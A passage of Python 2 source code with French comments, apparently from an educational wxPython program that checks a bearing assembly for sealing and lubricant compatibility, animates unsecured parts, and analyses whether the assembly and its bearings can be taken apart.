"PV" : False},
"D" : {"P" : False,
"PV" : False},
"B" : []}
pasDeJoint = {"G" : {"Ar" : False,
"Al" : False},
"D" : {"Ar" : False,
"Al" : False},
"B" : False}
for p in ["G","D"]:
# Etanchéité statique
#--------------------
for r in ["Ar","Al"]:
if self.mtg.palier[p].jnt[r].num is None:
# print "pas de joint", p,r,
# pasEtanchStat[p][r] = True
pasDeJoint[p][r] = True
if r == "Ar":
pasDeJoint["B"] = True
pasEtanchStat["B"].append('ManqueJoint'+p)
pressAdm = -1
else:
if self.mtg.palier[p].jnt["Ar"].num is None:
pressAdm = -1
else:
pressAdm = self.cdcf.pressionAdmChapeau
else:
pressAdm = self.mtg.palier[p].jnt[r].pressAdm[r]
# print "Pr",self.cdcf.pression.get(), "PrAdm",pressAdm
if pressAdm < self.cdcf.pression.get():
# print "pas étanche !", pressAdm, "<", self.cdcf.pression.get()
pasEtanchStat[p][r] = True
if not ('PressTrop'+p in pasEtanchStat["B"]):
pasEtanchStat["B"].append('PressTrop'+p)
# else: print
# Etanchéité dynamique
#---------------------
# Calcul du facteur PV
if self.mtg.palier[p].taille == "P" :
coefVitt = 1
else:
coefVitt = 1.5
facteurPV = self.cdcf.pression.get()*self.cdcf.vitesse.get()*coefVitt/ \
(self.cdcf.echellePression*self.cdcf.echelleVitesse*coefVitt) \
*10
# print "PV", facteurPV,
# Vitesse admissible par le joint
if self.mtg.palier[p].jnt["Ar"].num is None:
vittAdm = 10
facteurPVAdm = -1
else:
vittAdm = self.mtg.palier[p].jnt["Ar"].vittAdm
facteurPVAdm = self.mtg.palier[p].jnt["Ar"].facteurPV
# print "PVAdm", facteurPVAdm
# Test à la vitesse
if vittAdm < self.cdcf.vitesse.get():
pasEtanchDyn[p]["P"] = True
pasEtanchDyn["B"].append('VitesseTrop'+p)
# Test au facteur PV
if facteurPVAdm < facteurPV:
pasEtanchDyn[p]["PV"] = True
pasEtanchDyn["B"].append('FactPVTrop'+p)
#
# Compatibilité lubrifiant
#
compatible = True
if self.cdcf.lubrifiant.get() == 0 :
for p in ["G","D"]:
if self.mtg.palier[p].jnt["Ar"].num is 203:
compatible = False
continue
#
# Bilan
#-------
self.resultatEtancheite["S"] = pasEtanchStat
self.resultatEtancheite["J"] = pasDeJoint
if compatible:
self.resultatEtancheite["C"] = Const.MessageAnalyse('LubrifComp')
else:
self.resultatEtancheite["C"] = Const.MessageAnalyse('LubrifPasComp')
if pasEtanchStat["B"] <> []:
self.resultatEtancheite["SB"] = Const.MessageAnalyse('PasEtanchStat')
self.resultatEtancheite["SB+"] = []
for m in pasEtanchStat["B"]:
self.resultatEtancheite["SB+"].append(Const.MessageAnalyse(m[:-1],m[-1:]))
else:
self.resultatEtancheite["SB"] = Const.MessageAnalyse('EtanchStat')
self.resultatEtancheite["D"] = pasEtanchDyn
if pasEtanchDyn["B"] <> []:
self.resultatEtancheite["DB"] = Const.MessageAnalyse('PasEtanchDyn')
self.resultatEtancheite["DB+"] = []
for m in pasEtanchDyn["B"]:
self.resultatEtancheite["DB+"].append(Const.MessageAnalyse(m[:-1],m[-1:]))
else:
self.resultatEtancheite["DB"] = Const.MessageAnalyse('EtanchDyn')
##########################################################################
# Analyse : type de charge #
##########################################################################
###########################################################################
def montrerCollision(self, zoneMtg, lstCode, palier = None,
active = True, deuxCouleurs = True):
""" Met en évidence les obstacles au démontage """
# print "Montrer collision :",lstCode,
obstaclesRoulements = len(lstCode) == 1
# # On quitte si déja démonté ...
# if not obstaclesRoulements and self.elemDemonte <> []:
# return
# # On quitte si déja démonté ...
# if obstaclesRoulements and not ("AnimEnsb0" in self.elemDemonte \
# or "AnimEnsb1" in self.elemDemonte):
# return
if (self.cdcf.bagueTournante == "I" and not obstaclesRoulements) \
or (self.cdcf.bagueTournante == "E" and obstaclesRoulements):
rad = "Al"
else:
rad = "Ar"
#
# Ajout roulement pour obstacles roulement
if obstaclesRoulements:
lstCode = [lstCode[0], "R"+palier+"---"]
# else:
# lstCode = lstCode
# print lstCode
# Liste des position pour la flêche
lstPos = []
# Couleurs d'affichage
if deuxCouleurs:
coul = "rouge"
else:
coul = "noir"
lstCodeCoul = [[lstCode[0],"noir"],
[lstCode[1],coul]]
for pcode in lstCodeCoul:
elemClef = self.mtg.clefElemPosCode(pcode[0])
elem = elemClef[0]
lstClef = elemClef[1]
lstPos.append(Montage.PositionDansPivot().posCode(pcode[0]))
# for clef in lstClef:
# if active:
# elem.item[clef].couleur(pcode[1])
# else:
# elem.item[clef].normale()
# print lstPos
if active:
self.obstacleTrace = (lstPos,rad)
else:
self.obstacleTrace = None
zoneMtg.Redessiner(self)
##########################################################################
def animerManqueArret(self, zoneMtg, sens, position = None):
"Animation des éléments non arrêtés axialement"
# print "Animation des éléments non arrêtés axialement"
# print "listeElementsNonArretes",self.listeElementsNonArretes[sens]
wx.BeginBusyCursor()
lstItemAnim = []
# signe du sens de déplacement ##############################
sgn = 1 - sens*2
# Préparation des éléments non arêtés #####################
for i in zoneMtg.lstItemMtg: # On parcours tous les items affichés
# On inclus tous les éléments d'arbres
if TAG_ARBRE in i.tag:
lstItemAnim.append(i)
continue
# On inclus les éléments de la liste (sans les éléments d'alésage)
else:
# print i.tag,
for t in self.listeElementsNonArretes[sens]:
if t in i.tag and not TAG_ALESAGE in i.tag:
lstItemAnim.append(i)
continue
s = set(lstItemAnim)
lstItemAnim = list(s)
# print "lstItemAnim",lstItemAnim
# Lancement de l'animation
#=========================
# Durée (en seconde) & amplitude (en pixels)
duree, amplitude = 2, 4
# Nombre de positions
nbPos = duree * 25
# Calcul du pas
s = 0
for n in range(nbPos):
s += sin((1.0*n)/nbPos*pi)
# pas = 2 * amplitude/s
# def GroupeBmp(lstItem):
# # Regroupement des images
# bmp = wx.EmptyBitmap(zoneMtg.maxWidth, zoneMtg.maxHeight)
# memdc = wx.MemoryDC(bmp)
# memdc.SetBackground(wx.Brush(wx.Colour(255,255,254))) #wx.TRANSPARENT_BRUSH)
# memdc.Clear()
# for i in lstItemAnim:
# memdc.DrawBitmap(i.bmp, i.pos[0], i.pos[1], True)
## zoneMtg.hachurer(memdc, self.listeElementsNonArretes[sens])
# memdc.SelectObject(wx.NullBitmap)
# img = wx.ImageFromBitmap(bmp)
# img.SetMaskColour(255,255,254)
# img.SetMask(True)
# bmp = wx.BitmapFromImage(img)
# return bmp
# Sauvegarde de la position en x de chaque item
for i in lstItemAnim:
i.x = i.pos[0]
if position == None:
# Mouvement
oldx = 0
for c in range(nbPos):
tm = time.clock()
x = int(round(-amplitude*cos(pi*2*c/nbPos)+amplitude))
if x <> oldx:
for i in lstItemAnim:
i.pos = (i.x + sgn*x, i.pos[1])
oldx = x
zoneMtg.Redessiner()
dt = 0.05 - time.clock() + tm
if dt > 0:
time.sleep(dt)
else:
for i in lstItemAnim:
i.pos = (i.x + sgn*amplitude*2*position, i.pos[1])
wx.EndBusyCursor()
##########################################################################
# Analyse : montabilité #
##########################################################################
def analyserMontabilite(self, demonterRltSerres, zoneMtg):
""" Analyse de la montabilité du montage
"""
self.demonterRltSerres = demonterRltSerres
# Montabilité du montage
# --> Rélultat général :
self.resultatMontabilite = None
# --> Liste des éléments mobiles : une par sens ...
self.listeElemArbre = [[],[]]
# --> Liste des éléments fixes : une par sens ...
self.listeElemAlesage = [[],[]]
# --> Liste des éléments à démonter pour le démontage : une par sens ...
self.lstArretsAEnleverEns = [[],[]]
# --> Liste des éléments à démonter pour le démontage des roulements : une par sens et par palier...
self.lstArretsAEnleverRlt = {"G" : [[],[]],
"D" : [[],[]]}
# --> Liste des obstacles au Montage/Démontage de l'ensemble: une par sens ...
self.obstacleEnsble = [[],[]]
# --> Liste des obstacles au Montage/Démontage des roulements: une par sens et par palier ...
self.obstacleRoults = {"G" : [[],[]],
"D" : [[],[]]}
# --> Liste des obstacles au Montage/Démontage des bagues isolées : une par sens et par palier ...
self.obstacleBagueIsolee = {"G" : [[],[]],
"D" : [[],[]]}
def bagueIndemontable(rad):
if rad == "Ar":
if self.cdcf.bagueTournante == "I" and not self.demonterRltSerres:
return True
else:
return False
elif rad == "Al":
if self.cdcf.bagueTournante == "E" and not self.demonterRltSerres:
return True
else:
return False
class groupeMontage():
def __init__(self):
self.lst = [[]] * 6
self.min = [1] * 6
def __repr__(self):
t = []
n = 1
for p in self.lst:
n = max(n,len(p))
c = ""
for m in self.min:
c += "\t "+str(m)
t.append(c+"\n")
for l in range(n):
c = ""
for p in self.lst:
try:
c += "\t"+p[l]
except:
c += "\t"
t.append(c+"\n")
if self.lst[0][0][4] == "r":
t.reverse()
texte = ''.join(t)
return texte
def agrandir(self, pos, groupeOppose):
tranche = self.lst[pos]
trancheOpp = groupeOppose.lst[pos]
if len(tranche) > self.min[pos]:
trancheOpp.append(tranche.pop())
return True
return False
def enlever(self, pos, mtg, lstArretsAEnleverEns):
tranche = self.lst[pos]
# print tranche[-1:][0]
if mtg.estEnlevable(tranche[-1:][0]):
lstArretsAEnleverEns.append(tranche.pop())
return True
return False
def listeElementsArbre(sens):
""" Renvoie la liste des éléments liés à l'arbre
sur leur logement dans le sens <sens>
PROVISOIRE !!
"""
# print "Etabli la listedes éléments liés à l'arbre"
# print ">>> Sens",sens
# print ">>> Démonter Rlts serrés :",self.demonterRltSerres
grp = groupeMontage()
# La liste la plus petite possible (seulement les logements)
lst = [["-G-Ar"],
["-G-Ar"],
["-G-Ar"],
["-D-Ar"],
["-D-Ar"],
["-D-Ar"]]
# On met les arrêts d'arbre
for pos in [0,2,3,5]:
p = lst[pos][0][1]
if pos == 0 or pos == 3:
c = "G"
else:
c = "D"
elem = self.mtg.palier[p].arr["Ar"][c]
if elem.num is not None:
if not elem.estEntretoise():
lst[pos].append("A"+p+c+"Ar")
# On met les roulements (si sérrés sur l'arbre)
for pos in [1,4]:
p = lst[pos][0][1]
elem = self.mtg.palier[p].rlt
if elem.num is not None:
if bagueIndemontable("Ar"):
if elem.estSeparableSens(not sens, "Ar"):
lst[pos].append("R"+p+"-Ar")
else:
lst[pos].append("R"+p+"---")
# On retourne pour mettre dans le sens du démontage
if sens == 1:
lst.reverse()
grp.lst = lst
# On défini les "niveaux" minimum ...
for p in [0,1,4,5]:
grp.min[p] = len(grp.lst[p])
for p in [2,3]:
grp.min[p] = len(grp.lst[p])
return grp
def listeElementsAlesage(lstAr, sens):
""" Renvoie la liste des éléments "libres"
= complémentaire de <lMob> !
"""
def ccote(pos):
if (pos == 0 or pos == 3) and sens == 0 \
or (pos == 2 or pos == 5) and sens == 1:
return "G"
else:
return "D"
grp = groupeMontage()
# La liste la plus grande possible
lst = [["-G-Al", "AGGAl", "AGGAr"],
["-G-Al", "RG---", "RG-Al", "RG-Ar"],
["-G-Al", "AGDAl", "ADGAl", "AGDAr", "ADGAr"],
["-D-Al", "ADGAl", "AGDAl", "ADGAr", "AGDAr"],
["-D-Al", "RD---", "RD-Al", "RD-Ar"],
["-D-Al", "ADDAl", "ADDAr"]]
# On retourne pour mettre dans le sens du démontage
if sens == 1:
lst.reverse()
# On ote ceux qui sont déja dans lstAr
for pos in range(6):
for p in lstAr[pos]:
if p in lst[pos]:
lst[pos].remove(p)
if p[0] == "R":
if p[4] == "-":
lst[pos].remove(p[0:3]+"Ar")
lst[pos].remove(p[0:3]+"Al")
else:
lst[pos].remove(p[0:3]+"--")
# On ote les arrets absents
for pos in [0,2,3,5]:
for p in lst[pos][1:]:
palier = p[1]
cote = p[2]
rad = p[-2:]
elem = self.mtg.palier[palier].arr[rad][cote]
if elem.num is None:
lst[pos].remove(p)
# On ajoute les entretoises sur épaulement
for r in ["Ar","Al"]:
if sens == 0:
pG, pD = 2,3
else:
pG, pD = 3,2
elemG, elemD = self.mtg.palier["G"].arr[r]["D"], self.mtg.palier["D"].arr[r]["G"]
if elemG.estEpaulement() and elemD.estEntretoise():
try:
lst[pD].remove("AGD"+r)
except: pass
elif elemD.estEpaulement() and elemG.estEntretoise():
try:
lst[pG].remove("ADG"+r)
except: pass
else:
try:
lst[pD].remove("AGD"+r)
except: pass
try:
lst[pG].remove("ADG"+r)
except: pass
# On ote les morceaux de roulements inutiles
for pos in [1,4]:
if len(lst[pos]) > 3:
p = lst[pos][0][1]
elem = self.mtg.palier[p].rlt
if elem.num is None:
lst[pos].remove("R"+p+"---")
lst[pos].remove("R"+p+"-Ar")
lst[pos].remove("R"+p+"-Al")
elif elem.estSeparableSens(sens, "Al"):
lst[pos].remove("R"+p+"---")
else:
lst[pos].remove("R"+p+"-Ar")
lst[pos].remove("R"+p+"-Al")
grp.lst = lst
# On défini les "niveaux" minimum ...
# On compte les arrêts d'alésage
for pos in [0,2,3,5]:
p = lst[pos][0][1]
c = ccote(pos)
elem = self.mtg.palier[p].arr["Al"][c]
# print pos, elem.num
if elem.num is not None:
if not elem.estEntretoise():
grp.min[pos] +=1
# On met les roulements (si sérrés sur l'arbre)
for pos in [1,4]:
p = lst[pos][0][1]
elem = self.mtg.palier[p].rlt
if elem.num is not None:
if self.cdcf.bagueTournante == "E" and not self.demonterRltSerres:
grp.min[pos] +=1
return grp
def listeElementsAEnleverRlt(sens, palier):
"Etabli la liste des éléments à enlever pour le démontage des roulements"
lst = []
if (sens == 0 and palier == "G") \
or (sens == 1 and palier == "D"):
if self.mtg.deuxrlt():
return []
if sens == 0:
a = "D"
else:
a = "G"
if self.cdcf.bagueTournante == "I":
r = "Ar"
else:
r = "Al"
if self.mtg.palier["G"].rlt.num is None:
p = "D"
elif self.mtg.palier["D"].rlt.num is None:
p = "G"
else:
p = a
code = "A"+p+a+r
if self.mtg.clefElemPosCode(code)[0].num is not None:
lst.append(code)
#
# On s'occupe des joints
#
# Listes des éléments libres et fixes
# if self.cdcf.bagueTournante == "I":
# lstElemLibres = self.listeElemAlesage[sens]
# else:
# lstElemLibres = self.listeElemArbre[sens]
# self.lstArretsAEnleverEns[sens]
lstElemEnleve = self.lstArretsAEnleverEns[0] + self.lstArretsAEnleverEns[1]
# print "Liste élem enlevés", lstElemEnleve
code = "J"+p+"-Ar"
if self.mtg.clefElemPosCode(code)[0].num is not None and not code in lstElemEnleve:
lst.append(code)
code = "J"+p+"-Al"
if self.mtg.clefElemPosCode(code)[0].num is not None and not code in lstElemEnleve:
lst.append(code)
# print lst
## print ">>> à enlever",palier , lst
return lst
def estDemontable(sens):
"Teste si le montage est démontable dans le sens <sens>"
def demontagePossible(sens, posAr, posAl):
def dimension(int_ext, pcode, fix = False):
"""Renvoie la dimension de l'élément à la position <pcode>
mesurée depuis l'<int_ext>
parmis les éléments <fix> ou pas"""
## print "Dimension pcode =",pcode
if pcode[3:] == "--":
dicElem = {"Ar" : self.mtg.clefElemPosCode(pcode[0:3]+"Ar")[0],
"Al" : self.mtg.clefElemPosCode(pcode[0:3]+"Al")[0]}
if (int_ext == "E" and dicElem["Al"].num is not None) \
or (int_ext == "I" and dicElem["Ar"].num is None):
rad = "Al"
else:
rad = "Ar"
elem = dicElem[rad]
else:
elem = self.mtg.clefElemPosCode(pcode)[0]
radiale = pcode[3:]
if radiale == "--":
if self.cdcf.bagueTournante == "I":
radiale = "Al"
else:
radiale = "Ar"
## print " --> élém =",elem,elem.pos,elem.taille
dim = elem.dimensions(radiale, int_ext, self.mtg.palier[pcode[1]].taille)
## print " --> dimension =",dim
# Choix de la dimension appropriée :
#-----------------------------------
# Cas roulements séparés
if pcode <> "" and pcode[0] == "R" and pcode[3] == "A":
return dim['demonte']
# Cas des arrêts démontables
if elem.num <> None \
and not elem.pasDemontable(not self.mtg.deuxrlt(),elem.pos) \
and fix:
## print "Démontage élément",elem.num,pcode,elem.pos
return dim['demonte']
# Cas des Arrêts mobiles
if int_ext == "E" and pcode[0] == "A":
return dim['entier']
return dim['entier']
# print lAr[posAr][-1:][0],lAl[posAl][-1:][0],
dimAr = dimension("E", lAr[posAr][-1:][0])
dimAl = dimension("I", lAl[posAl][-1:][0])
# print "\t",dimAr, dimAl,
if dimAl >= dimAr: # Ca passe !
# print
if posAl > 0:
return demontagePossible(sens, posAr, posAl-1)
elif posAr > 1:
return demontagePossible(sens, posAr-1, posAr-2)
else:
return True
else: # Ca passe pas !
# print "^",
if not bagueIndemontable("Al") and grAl.enlever(posAl, self.mtg, self.lstArretsAEnleverEns[sens]):
# print "//",lAl[posAl][-1:][0]
return demontagePossible(sens, posAr, posAl)
elif not bagueIndemontable("Ar") and grAr.enlever(posAr, self.mtg, self.lstArretsAEnleverEns[sens]):
# print "//",lAr[posAr][-1:][0]
return demontagePossible(sens, posAr, posAl)
elif grAl.agrandir(posAl, grAr):
if posAl in [2,3]:
p = lAr[posAl][-1:][0][1]
c = lAr[posAl][-1:][0][2]
rad = lAr[posAl][-1:][0][3:]
elem = self.mtg.palier[p].arr[rad][c]
if elem.estEntretoise():
# print "^",
grAl.agrandir(posAl-1, grAr)
# print "Al"
return demontagePossible(sens, posAr, posAl)
else:
# print "--"
return [posAr, posAl]
# print "Test Montabilité Ensemble ...", sens
self.lstArretsAEnleverEns[sens] = []
grAr = listeElemArbre
lAr = listeElemArbre.lst
grAl = listeElemAlesage
lAl = listeElemAlesage.lst
obs = demontagePossible(sens, 5, 4)
if obs is not True:
self.obstacleEnsble[sens] = [lAr[obs[0]][-1:][0],lAl[obs[1]][-1:][0]]
# Compilation et mise à jour des listes
#--------------------------------------
# print ">>> Arbre :\n",listeElemArbre
# print ">>> Alésage :\n",listeElemAlesage
lst = []
for l in listeElemArbre.lst:
lst += l[1:]
s = set(lst)
lst = list(s)
self.listeElemArbre[sens] = lst
lst = []
for l in listeElemAlesage.lst:
lst += l[1:]
s = set(lst)
lst = list(s)
self.listeElemAlesage[sens] = lst
# Traitement des joints
#-----------------------
# On s'occupe de ceux qui sont associée à un arret alésage
for p in ["G","D"]:
for r in ["Ar","Al"]:
if self.mtg.palier[p].jnt[r].num is not None:
codeArrAssocie = "A"+p+p+"Al"
if codeArrAssocie in self.lstArretsAEnleverEns[sens]:
self.lstArretsAEnleverEns[sens].append("J"+p+"-"+r)
else:
self.listeElemAlesage[sens].append("J"+p+"-"+r)
# On s'occupe de ceux qui gènent de toute façon ... si démontage possible !
if self.obstacleEnsble[sens] == [] :
# On déterminer le coté qui gène ...
# if (sens == 0 and self.cdcf.bagueTournante == "I")\
# or (sens == 1 and self.cdcf.bagueTournante == "E"):
# p = "G"
# else:
# p = "D"
if sens == 0:
p = "G"
else:
p = "D"
# print "Coté qui gène :", p, sens, self.cdcf.bagueTournante
# On enlève le(s) joint(s) qui gène(nt) ...
enleveJnt = False
for r in ["Ar","Al"]:
if self.mtg.palier[p].jnt[r].num is not None:
self.lstArretsAEnleverEns[sens].append("J"+p+"-"+r)
enleveJnt = True
# On enlève l'arrêt qui est sur le même chapeau ...
if enleveJnt:
enleveJnt = False
codeArrAssocie = "A"+p+p+"Al"
if codeArrAssocie in self.listeElemAlesage[sens]:
self.lstArretsAEnleverEns[sens].append(codeArrAssocie)
# print ">>> Arbre :",self.listeElemArbre[sens]
# print ">>> Alésage :",self.listeElemAlesage[sens]
# print ">>> Obstacles :", self.obstacleEnsble[sens]
# print ">>> Eléments à enlever :", self.lstArretsAEnleverEns[sens]
# print
return
def estDemontableRlt(sens, palier, bagueLibre):
"Teste si le roulement <palier> est démontable dans le sens <sens>"
# print
# print "Test Montabilité Roulements"
# print ">>> Sens",sens
# print ">>> Roulement",palier
# print ">>> Bague libre",bagueLibre
# Détermination des arrets concernés pour le démontage du roulement
lstArrets = []
if (self.cdcf.bagueTournante == "I" and bagueLibre) \
or (self.cdcf.bagueTournante == "E" and not bagueLibre):
radiale = "Ar"
else:
radiale = "Al"
if sens == 0:
if palier == "D":
lstArrets.append("ADD"+radiale)
else:
lstArrets.append("AGD"+radiale)
lstArrets.append("ADG"+radiale)
lstArrets.append("ADD"+radiale)
else:
if palier == "G":
lstArrets.append("AGG"+radiale)
else:
lstArrets.append("ADG"+radiale)
lstArrets.append("AGD"+radiale)
lstArrets.append("AGG"+radiale)
## print ">>> Arrêts",lstArrets
tailleRlt = self.mtg.palier[palier].rlt.taille
passPas = []
pos = Montage.PositionDansPivot()
for pa in lstArrets:
ar = self.mtg.elemPos(pos.posCode(pa))
if ar.num is None:
tailleArret = self.mtg.palier[pa[1]].taille
pa = "-"+pa[1]+"-"+pa[3:5]
else:
tailleArret = ar.taille
if tailleRlt <> tailleArret \
and ((radiale == "Ar" and tailleArret == "G") \
or (radiale == "Al" and tailleArret == "P")):
if ar.estEntretoise():
if pa[1] <> palier:
passPas.append("-"+pa[1]+"-"+pa[3:5])
else:
passPas.append(pa)
if tailleRlt == tailleArret and ar.pasDemontable(not self.mtg.deuxrlt()):
passPas.append(pa)
## print ">>> Obstacles",passPas
if len(passPas)>0:
posObs = []
for i in passPas:
posObs.append(pos.posXCode(i))
if palier == "G":
plusProche = passPas[posObs.index(min(posObs))]
else:
plusProche = passPas[posObs.index(max(posObs))]
passPas = [plusProche]
# print ">>> Obstacles",passPas
return passPas
def traiterBaguesIsolees():
obsBagueIsolee = {"G" : [],
"D" : []}
for palier in ["G","D"]:
for sens in [0,1]:
if self.obstacleBagueIsolee[palier][sens] <> []:
obsBagueIsolee[palier].append(self.obstacleBagueIsolee[palier][sens][0])
if len(obsBagueIsolee[palier]) >= 2:
self.obstacleBagueIsolee[palier] = obsBagueIsolee[palier]
else:
del self.obstacleBagueIsolee[palier]
# print "Obstacles Bagues isolées :",self.obstacleBagueIsolee
#
# On lance l'analyse ...
#
for sens in [0,1]:
# Etabli les listes des éléments libres et des éléments sérrés
listeElemArbre = listeElementsArbre(sens)
# print ">>> Eléments Arbre :\n", listeElemArbre
listeElemAlesage = listeElementsAlesage(listeElemArbre.lst, sens)
# print ">>> Eléments Alésage :\n", listeElemAlesage
# self.listeElemArbre[sens] = listeElementsArbre(sens)
# self.listeElemAlesage[sens] = listeElementsAlesage(self.listeElemArbre[sens],sens)
# Teste si le montage est démontable
estDemontable(sens)
# Etabli la liste des éléments à enlever pour le démontage
# self.lstArretsAEnleverEns[sens] = listeElementsAEnleverEns(sens)
for sens in [0,1]:
# Teste si les roulements sont démontables
for p in ["G","D"]:
self.obstacleRoults[p][sens] = estDemontableRlt(sens,p,True)
# Teste si les bagues isolées sont démontables
for p in ["G","D"]:
self.obstacleBagueIsolee[p][sens] = estDemontableRlt(sens,p,False)
# Etabli la liste des éléments à enlever pour le démontage des roulements
for p in ["G","D"]:
self.lstArretsAEnleverRlt[p][sens] = listeElementsAEnleverRlt(sens,p)
# On inserse le sens de démontage si bague tournante extérieure
if self.cdcf.bagueTournante == "E":
# print "Retournement sens montage ..."
self.listeElemArbre.reverse()
self.listeElemAlesage.reverse()
self.lstArretsAEnleverEns.reverse()
self.obstacleEnsble.reverse()
# Traitement des bagues isolées
traiterBaguesIsolees()
## print "Bagues isolées :",self.obstacleBagueIsolee
# # On prépare les item pour les animations
# for sens in [0,1]:
# self.preparerMontageDemontageEns(sens)
# for p in ["G","D"]:
# self.preparerMontageDemontageRlt(sens,p)
## print "Obsacles roulements 1 :",self.obstacleRoults
# Montabilité Général :
#----------------------
montables = {}
# roulements
for p in self.obstacleRoults:
obs = self.obstacleRoults[p]
montables[p] = (obs[0] == []) or (obs[1] == [])
# bagues isolées
for p in self.obstacleBagueIsolee:
obs = self.obstacleBagueIsolee[p]
montables["I"+p] = obs == []
# cas des roulements obstacle
for p in ["G","D"]:
if p == "G":
o = "D"
s = 0
else:
o = "G"
s = 1
obs = self.obstacleRoults[p]
ropp = self.obstacleRoults[o]
if ropp[0] <> [] and ropp[1] <> [] and obs[s] == []:
obs[s].append("R"+o+"---")
## print "Correction obstacle rlt",p,"sens",s," : ",obs[s]
# ensemble
for s in [0,1]:
## print "MONTABILITE"
## print self.obstacleEnsble[s]
montables[s] = self.obstacleEnsble[s] == []
# montables[s] = True
# for p in ["G","D"]:
# montables[s] = montables[s] and (self.obstacleEnsble[s][p] == ())
## print montables[s]
montables["E"] = montables[0] or montables[1]
del montables[0]
del montables[1]
# print montables
montable = True
for t in montables:
montable = montable and montables[t]
if montable:
self.resultatMontabilite = Const.MessageAnalyse('MontPoss')
else:
self.resultatMontabilite = Const.MessageAnalyse('MontImposs')
self.listeItemLibres = [self.GetListeItemLibres(zoneMtg, 0), self.GetListeItemLibres(zoneMtg, 1)]
self.ListeItemRoult = {"G" : [self.GetListeItemRoult(zoneMtg, 0, "G"),self.GetListeItemRoult(zoneMtg, 1, "G")],
"D" : [self.GetListeItemRoult(zoneMtg, 0, "D"),self.GetListeItemRoult(zoneMtg, 1, "D")]}
## print "Obsacles roulements 2 :",self.obstacleRoults
##########################################################################
def afficher_cacherArretsAEnleverEns(self, zoneMtg, sens, afficher = True, instant = False):
self.afficher_cacherArretsAEnlever(zoneMtg, sens, "E", afficher, instant)
##########################################################################
def afficher_cacherArretsAEnleverRlt(self, zoneMtg, sens, afficher = True, instant = False):
self.afficher_cacherArretsAEnlever(zoneMtg, sens, False, afficher, instant)
##########################################################################
def afficher_cacherArretsAEnlever(self, zoneMtg, sens, objet, afficher, instant):
""" Affiche ou cache les éléments à enlever pour le montage/démontage
sens du démontage : <sens>
objet à enlever : <objet> = "E" ou "G" ou "D"
instantanément : <instant>
"""
# print " Afficher/Cacher éléments à enlever :",tag
# sens = eval(tag[8])
ensemble = objet == "E"
if self.cdcf.bagueTournante == "I" and ensemble \
or self.cdcf.bagueTournante == "E" and not ensemble:
radiale = "Al"
else:
radiale = "Ar"
# Cas des "Ensembles"
if objet == "E":
lst = self.lstArretsAEnleverEns[sens]
# Cas des roulements
else:
## if (tag[7] == "G" and sens == 1) \
## or (tag[7] == "D" and sens == 0):
lst = self.lstArretsAEnleverRlt[objet][sens]
## else:
## lst = []
# print " ... élém à enlever :",sens, lst
if len(lst) == 0:
return
# Préparation des paramètres de "fondu"
if instant:
rng = range(0,101, 100)
else:
rng = range(0,101,4) # en %
if afficher:
n = 'imag'
o = 'vide'
else:
n = 'vide'
o = 'imag'
rng.reverse()
# # Préparation des éléments non arêtés #####################
# for i in zoneMtg.lstItemMtg: # On parcours tous les items affichés
# # On inclus tous les éléments d'arbres
# if TAG_ARBRE in i.tag:
# lstItemAnim.append(i)
# continue
# # On inclus les éléments de la liste (sans les éléments d'alésage)
# else:
# print i.tag,
# for t in self.listeElementsNonArretes[sens]:
# if t in i.tag and not TAG_ALESAGE in i.tag:
# lstItemAnim.append(i)
# continue
lstItemEff = []
for itemTag in lst:
e = self.mtg.clefElemPosCode(itemTag)[0]
# lstItemEff.append(e.item['imag'])
for i in zoneMtg.lstItemMtg: # On parcours tous les items affichés
for t in e.item['imag'].tag:
if t in i.tag:
lstItemEff.append(i) # On rajoute tous les item qui ont le même tag
# print " ... items effacés :",lstItemEff
lstItemEch = []
for i in lstItemEff:
if hasattr(i, "vide"):
lstItemEch.append(i)
else:
lstItemEch.append(None)
# print " ... items échangés :",lstItemEch
# Le fondu ...
for niv in rng[1:]:
for i in range(len(lstItemEff)):
lstItemEff[i].fondu(lstItemEch[i], niv)
if not instant:
zoneMtg.Redessiner()
time.sleep(0.020)
return
############################################################
def GetListeItemLibres(self, zoneMtg, sens):
""" Préparation du Montage/Démontage de l'ensemble "Alésage"
renvoie la liste des items qui vont se déplacer ...
"""
## print
# print "Préparation du Montage/Démontage ""Ensemble"""
# print ">>> sens",sens
# tag = "AnimEnsb" + str(sens)
## print " ... tag =",tag
def lstElemAEnlever(rad):
lst = []
for c in self.lstArretsAEnleverEns[sens]:
if rad == "Ar":
if c[0] != "J" and c[-2:] == rad:
lst.append(c)
else:
if c[0] == "J" or c[-2:] == rad:
lst.append(c)
return lst
#
# On selectionne les éléments libres
#
if self.cdcf.bagueTournante == "I":
rad = TAG_ALESAGE
lstElemLibres = self.listeElemAlesage[sens]
lstElemLibres.extend(lstElemAEnlever("Al"))
else:
rad = TAG_ARBRE
lstElemLibres = self.listeElemArbre[sens]
lstElemLibres.extend(lstElemAEnlever("Ar"))
# print ">>> Liste Elem Libres sens", sens, ":",lstElemLibres
#
# On selectionne les items libres
#
lstItemAnim = []
for i in zoneMtg.lstItemMtg:
#
# On inclus les éléments d'arbres ou bien d'alésage
#
if rad in i.tag:
lstItemAnim.append(i)
continue
#
# On inclus les éléments de la liste 'lstElemLibres'
#
else:
# print i.tag,
for t in lstElemLibres:
# print t
if t in i.tag:
lstItemAnim.append(i)
# print
continue
# print "1",lstItemAnim
#
# On ajoute les suppléments d'arrêts à enlever qui peuvent être démontés/montés
#
# for itemTag in self.lstArretsAEnleverEns[sens]:
# e = self.mtg.clefElemPosCode(itemTag[0:])[0]
# if e.item.has_key('supp'):
# lstItemAnim.append(e.item['supp'])
# print "2",lstItemAnim
return lstItemAnim
############################################################
def GetListeItemRoult(self, zoneMtg, sens, palier):
"""Préparation du Montage/Démontage des roulements"""
# print
# print "Préparation du Montage/Démontage ""Roulement"""
# print ">>> sens",sens
# print ">>> palier",palier
# tag = "AnimRlt" + palier + str(sens)
lstItemAnim = []
## print " ... tag =",tag
if self.cdcf.bagueTournante == "I":
radiale = "Ar"
radopp = "Al"
else:
radiale = "Al"
radopp = "Ar"
# Ensemble déja démonté
if "AnimEnsb0" in self.elemDemonte:
te = "AnimEnsb0"
elif "AnimEnsb1" in self.elemDemonte:
te = "AnimEnsb1"
else:
te = None
# Listes des éléments libres et fixes
if self.cdcf.bagueTournante == "I":
lstElemLibres = self.listeElemAlesage[sens]
lstElemFixes = self.listeElemArbre[sens]
else:
lstElemLibres = self.listeElemArbre[sens]
lstElemFixes = self.listeElemAlesage[sens]
# Liste des éléments à démonter ###########################
lst = []
# Le roulement ...
for tr in ["R"+palier+"-Ar",
"R"+palier+"-Al",
"R"+palier+"---"]:
if tr in lstElemFixes:
lst.append(tr)
# Autres éléments à démonter ...
